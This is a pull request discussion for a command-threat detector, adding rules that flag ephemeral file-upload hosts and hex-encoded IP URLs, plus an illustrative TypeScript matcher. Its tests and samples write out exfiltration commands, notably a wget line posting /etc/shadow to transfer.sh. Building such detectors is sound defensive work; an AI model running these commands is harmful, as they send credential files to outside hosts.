feat(threats): detect ephemeral file-upload hosts and hex-encoded IP URLs#41
Open
AdamWen230 wants to merge 2 commits into
…URLs Add CLT-URL-006 (data-exfil upload hosts: transfer.sh, file.io, temp.sh, bashupload.com, termbin.com, 0x0.st) and CLT-URL-007 (hex-encoded IP in URL, complementing CLT-URL-004's dotted-decimal coverage). Adds url-artifact support to the test createMatcher helper and a new url-threats.test.ts (20 cases, positive + FP-boundary negatives).
Collaborator

Hi AdamWen230, really nice work on this one. One fix required and one question before we merge:

Fix: add a wget test for CLT-URL-006 branch 2

The pattern includes wget in the network-tool gate but none of the tests exercise it:

    it("detects bare-domain transfer.sh upload via wget", () => {
      expect(matchCommand(engine, "wget https://transfer.sh/ --post-file /etc/shadow")).toContain("CLT-URL-006");
    });

Question: private-range handling in CLT-URL-007

CLT-URL-004 explicitly excludes loopback and RFC1918 ranges; CLT-URL-007 doesn't, so http://0x7f.0x0.0x0.0x1/ (hex-encoded 127.0.0.1) would match. Was that intentional? If so, a short comment in the YAML explaining the omission would help future maintainers; otherwise it looks like an oversight compared to CLT-URL-004.

Happy to approve once the wget test is in and we've heard back on the IP range question.
What

Adds two URL threat rules:

http://0xcb.0x0.0x71.0x5/ for 203.0.113.5), complementing CLT-URL-004's dotted-decimal coverage.

Why

Design notes

[command, url]: termbin.com is used via nc termbin.com 9999 with no URL scheme, so it never becomes a url artifact. The pattern requires a scheme OR a network tool (nc/curl/wget) to avoid false positives on local scripts named e.g. transfer.sh.

0x (e.g. 0x0.st) is not misclassified as a hex IP.

Tests

New url-threats.test.ts: 20 cases (positive coverage for every host / hex form + negative cases locking the FP boundaries). Also adds url artifact support to the createMatcher test helper, since URL rules previously had no heuristics-level unit coverage.
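To make the two boundaries discussed on this page concrete (the scheme-or-network-tool gate from the design notes, and the loopback/RFC1918 question raised in the review), here is an added TypeScript illustration. It is not the PR's YAML rules, the project's matcher or its test helper: the upload-host list and the nc/curl/wget tool list are taken from the PR text, and the private-range exclusion is the reviewer's suggestion of mirroring CLT-URL-004, implemented here as one possible choice rather than as what the PR does. The function names matchCommand and decodeHexIPv4, and the single-argument signature, are assumptions for this example (the project's matchCommand shown in the review takes an engine argument).

```typescript
// Added illustration, not the project's code. Re-implements the two checks
// under discussion on a single command line so the false-positive boundaries
// can be exercised directly.

// Hosts the PR lists for CLT-URL-006 (ephemeral upload services).
const UPLOAD_HOSTS: string[] = [
  "transfer.sh", "file.io", "temp.sh", "bashupload.com", "termbin.com", "0x0.st",
];

// Network tools from the PR's design notes: when the command starts with one of
// these, a bare hostname (no scheme) still counts as a URL use.
const NETWORK_TOOLS: string[] = ["curl", "wget", "nc"];

// Decode a four-group hex IPv4 host such as 0x7f.0x0.0x0.0x1 into octets.
// Returns null unless every group is 0x-prefixed and fits in one byte, so a
// registrable name like 0x0.st (two labels, second not hex) is never decoded.
function decodeHexIPv4(host: string): number[] | null {
  const parts = host.split(".");
  if (parts.length !== 4) return null;
  const octets: number[] = [];
  for (const p of parts) {
    if (!/^0x[0-9a-f]{1,2}$/i.test(p)) return null;
    octets.push(parseInt(p.slice(2), 16));
  }
  return octets;
}

// Loopback and RFC1918 ranges, mirroring the exclusions the review attributes
// to CLT-URL-004 (assumption: this is the reviewer's suggestion, not the PR's rule).
function isPrivateOrLoopback(o: number[]): boolean {
  const [a, b] = o;
  if (a === 127) return true;                       // 127.0.0.0/8
  if (a === 10) return true;                        // 10.0.0.0/8
  if (a === 172 && b >= 16 && b <= 31) return true; // 172.16.0.0/12
  if (a === 192 && b === 168) return true;          // 192.168.0.0/16
  return false;
}

// Return the rule ids (in first-hit order) that fire for one command line.
function matchCommand(cmd: string): string[] {
  const hits: string[] = [];
  const tokens = cmd.trim().split(/\s+/);
  const usesNetworkTool = NETWORK_TOOLS.includes(tokens[0]);

  for (const tok of tokens) {
    let host: string | null = null;
    // Branch 1: a URL with a scheme always yields a host.
    const m = /^[a-z][a-z0-9+.-]*:\/\/([^/:?#]+)/i.exec(tok);
    if (m) {
      host = m[1].toLowerCase();
    } else if (usesNetworkTool && /^[a-z0-9.-]+\.[a-z]{2,}$/i.test(tok)) {
      // Branch 2: a bare domain-looking token counts only behind a network tool,
      // so "bash transfer.sh" (a local script) stays quiet.
      host = tok.toLowerCase();
    }
    if (host === null) continue;

    if (UPLOAD_HOSTS.includes(host) && !hits.includes("CLT-URL-006")) {
      hits.push("CLT-URL-006");
    }
    const octets = decodeHexIPv4(host);
    if (octets !== null && !isPrivateOrLoopback(octets) && !hits.includes("CLT-URL-007")) {
      hits.push("CLT-URL-007");
    }
  }
  return hits;
}

// Constructed sample commands covering both positive and boundary cases.
const SAMPLES: string[] = [
  "wget https://transfer.sh/ --post-file /etc/shadow", // CLT-URL-006 via scheme
  "nc termbin.com 9999",                               // CLT-URL-006 via bare host + tool
  "bash transfer.sh",                                  // local script, no hit
  "curl http://0xcb.0x0.0x71.0x5/",                    // CLT-URL-007 (203.0.113.5)
  "curl http://0x7f.0x0.0x0.0x1/",                     // hex loopback, excluded here
  "curl https://0x0.st",                               // CLT-URL-006 only, not a hex IP
];
for (const s of SAMPLES) console.log(s, "->", matchCommand(s));
```

The decoder deliberately accepts only the four-group 0x form the PR describes; the loopback sample shows what the rule does if it adopts CLT-URL-004's exclusions, which is exactly the decision the review asks the author to make explicit.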